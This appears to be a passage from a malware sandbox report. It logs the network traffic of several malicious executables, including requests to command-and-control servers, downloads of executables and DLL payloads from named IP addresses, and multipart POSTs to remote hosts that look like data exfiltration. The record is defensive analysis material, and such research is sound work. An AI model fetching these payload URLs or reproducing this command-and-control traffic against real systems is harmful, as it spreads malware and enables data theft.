                                                            45.156.22.254
                                                          • flag-us
                                                            DNS
                                                            home.fivenn5sr.top
                                                            372485f12e.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            home.fivenn5sr.top
                                                            IN AAAA
                                                            Response
                                                          • flag-fi
                                                            POST
                                                            http://home.fivenn5sr.top/DoDOGDWnPbpMwhmjDvNk1739958006
                                                            372485f12e.exe
                                                            Remote address:
                                                            45.156.22.254:80
                                                            Request
                                                            POST /DoDOGDWnPbpMwhmjDvNk1739958006 HTTP/1.1
                                                            Host: home.fivenn5sr.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 56
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            server: nginx/1.22.1
                                                            date: Thu, 20 Feb 2025 14:08:50 GMT
                                                            content-type: text/html; charset=utf-8
                                                            content-length: 4
                                                          • flag-us
                                                            DNS
                                                            play.google.com
                                                            chrome.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            play.google.com
                                                            IN A
                                                            Response
                                                            play.google.com
                                                            IN A
                                                            142.250.178.14
                                                          • flag-gb
                                                            OPTIONS
                                                            https://play.google.com/log?format=json&hasfast=true
                                                            chrome.exe
                                                            Remote address:
                                                            142.250.178.14:443
                                                            Request
                                                            OPTIONS /log?format=json&hasfast=true HTTP/2.0
                                                            host: play.google.com
                                                            accept: */*
                                                            access-control-request-method: POST
                                                            access-control-request-headers: content-encoding,content-type
                                                            origin: chrome-untrusted://new-tab-page
                                                            user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
                                                            sec-fetch-mode: cors
                                                            sec-fetch-site: cross-site
                                                            sec-fetch-dest: empty
                                                            accept-encoding: gzip, deflate, br
                                                            accept-language: en-US,en;q=0.9
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/success?substr=mixtwo&s=three&sub=non
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /success?substr=mixtwo&s=three&sub=non HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:50 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/info
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /info HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:50 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 21
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/update
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /update HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: 1
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:51 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="fuckingdllENCR.dll";
                                                            Content-Length: 99856
                                                            Keep-Alive: timeout=5, max=98
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:51 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=97
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:53 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=96
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:55 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=95
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:58 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=94
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:00 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=93
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:02 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=92
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:04 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=91
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:06 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=90
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:09 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=89
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:11 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=88
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/service
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /service HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: C
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:13 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Length: 1
                                                            Keep-Alive: timeout=5, max=87
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/ycl
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /ycl HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: d
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:16 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="dll";
                                                            Content-Length: 242176
                                                            Keep-Alive: timeout=5, max=86
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                          • flag-nl
                                                            GET
                                                            http://185.156.73.73/ycl
                                                            BitLockerToGo.exe
                                                            Remote address:
                                                            185.156.73.73:80
                                                            Request
                                                            GET /ycl HTTP/1.1
                                                            Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                            Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                            Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                            Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                            User-Agent: s
                                                            Host: 185.156.73.73
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:09:16 GMT
                                                            Server: Apache/2.4.52 (Ubuntu)
                                                            Content-Disposition: attachment; filename="soft";
                                                            Content-Length: 1011200
                                                            Keep-Alive: timeout=5, max=85
                                                            Connection: Keep-Alive
                                                            Content-Type: application/octet-stream
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/luma/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /luma/random.exe HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:50 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 1863680
                                                            Last-Modified: Thu, 20 Feb 2025 13:32:58 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72f0a-1c7000"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/steam/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /steam/random.exe HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:53 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 1793024
                                                            Last-Modified: Thu, 20 Feb 2025 13:33:09 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72f15-1b5c00"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/well/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /well/random.exe HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:08:58 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 968192
                                                            Last-Modified: Thu, 20 Feb 2025 13:31:27 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72eaf-ec600"
                                                            Accept-Ranges: bytes
                                                          • flag-ru
                                                            GET
                                                            http://185.215.113.16/test/exe/random.exe
                                                            skotes.exe
                                                            Remote address:
                                                            185.215.113.16:80
                                                            Request
                                                            GET /test/exe/random.exe HTTP/1.1
                                                            Host: 185.215.113.16
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Thu, 20 Feb 2025 14:09:01 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 961024
                                                            Last-Modified: Thu, 20 Feb 2025 13:31:13 GMT
                                                            Connection: keep-alive
                                                            ETag: "67b72ea1-eaa00"
                                                            Accept-Ranges: bytes
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----4euknop8qimg4790rq90
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 1105
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-us
                                                            DNS
                                                            breakfasutwy.cyou
                                                            3e0505c684.exe
                                                            Remote address:
                                                            8.8.8.8:53
                                                            Request
                                                            breakfasutwy.cyou
                                                            IN A
                                                            Response
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
                                                            95.217.24.123:443
                                                            Request
                                                            POST / HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----2ngdj5xtj5x4e3wbaa16
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                            Host: 95.217.24.123
                                                            Content-Length: 202533
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 20 Feb 2025 14:08:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                          • flag-us
                                                            POST
                                                            https://penetratebatt.pw/api
                                                            1b80ca21fe.exe
                                                            Remote address:
                                                            172.67.161.147:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: penetratebatt.pw
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=4l61q3q9ifmgbmc6vq75g1m99l; expires=Fri, 21 Feb 2025 14:08:54 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dRDprZ71TiBnSpRvkqUvrmoCN1Zzur%2BaVycZYTjNkwhezAkwOP8iCRnNtGqvtRSxSCNyRhw8yE2%2BsaCgnJgfHLEIvRYzC9XepkVDV4fkUblDXlg0R8BFgDvMsRbkvY6J9N%2F5"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f12466ed7001f-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=32747&min_rtt=21606&rtt_var=26472&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=584&delivery_rate=159042&cwnd=253&unsent_bytes=0&cid=29174d27afbeb03e&ts=364&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            1b80ca21fe.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 403 Forbidden
                                                            Date: Thu, 20 Feb 2025 14:08:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            X-Frame-Options: SAMEORIGIN
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FYn82NsAeZdnK4EwTOEF2BHOWC%2Fkl0qJHn6A6GnQraHfjRiEVUdu0mpH35Sl3VN0R14sC5m1g44uv%2FamMoTPzgcVBCPFT78egJYz4FfFkjIzYlMMORGg0v8TdIyZv18F%2B5LYH9s%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1248bb58953b-LHR
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            1b80ca21fe.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cookie: __cf_mw_byp=f1aLY_qoXLvdP19ZxDf8TC70FMN339tAHqm4Vmr5jNg-1740060535-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 48
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=t2fjlgk267m6moi0v0773d0e92; expires=Fri, 21 Feb 2025 14:08:55 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vi9BMtqMnEzeRL%2BrhODA%2FdOB7QatVSdBxYdKdcpSe0JFW20q%2FUw33RMynG3UFCICEby5yrMU0x%2Fzrp9MA0oeYNKnbmeoe89IEb3lcNsOnikFNlw17zfmDlRsLj8OwHLDz00X078%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f1248db93953b-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22608&min_rtt=21006&rtt_var=4090&sent=14&recv=12&lost=0&retrans=0&sent_bytes=8135&recv_bytes=1060&delivery_rate=436053&cwnd=234&unsent_bytes=0&cid=3e99a11ff52c5d02&ts=325&x=0"
                                                          • flag-us
                                                            POST
                                                            https://pasteflawwed.world/api
                                                            1b80ca21fe.exe
                                                            Remote address:
                                                            172.67.214.11:443
                                                            Request
                                                            POST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=QIAK19U80KUR47E
                                                            Cookie: __cf_mw_byp=f1aLY_qoXLvdP19ZxDf8TC70FMN339tAHqm4Vmr5jNg-1740060535-0.0.1.1-/api
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 1629
                                                            Host: pasteflawwed.world
                                                            Response
                                                            HTTP/1.1 200 OK
                                                            Date: Thu, 20 Feb 2025 14:08:55 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            Vary: Accept-Encoding
                                                            Set-Cookie: PHPSESSID=jvja2kf9pi98bbpgeste26v7er; expires=Fri, 21 Feb 2025 14:08:55 GMT; Max-Age=86400; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0SK%2BmffTPffVqqOEAdm7dK%2FB6Xq4w2MZI5EUHA%2FML9hR9X4YwrgAzUFWuA9s%2F9Zns%2BaddbC4id0Kjzbj%2FsyFuLBDppqWg7lVwnDpShz%2FQom%2BpAUto7ZzuJjyFufKFVFAtj5QzP0%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 914f124c481c953b-LHR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=22442&min_rtt=21006&rtt_var=3398&sent=18&recv=16&lost=0&retrans=0&sent_bytes=9313&recv_bytes=3134&delivery_rate=436053&cwnd=234&unsent_bytes=0&cid=3e99a11ff52c5d02&ts=812&x=0"
                                                          • flag-fi
                                                            POST
                                                            https://95.217.24.123/
                                                            7aencsM.exe
                                                            Remote address:
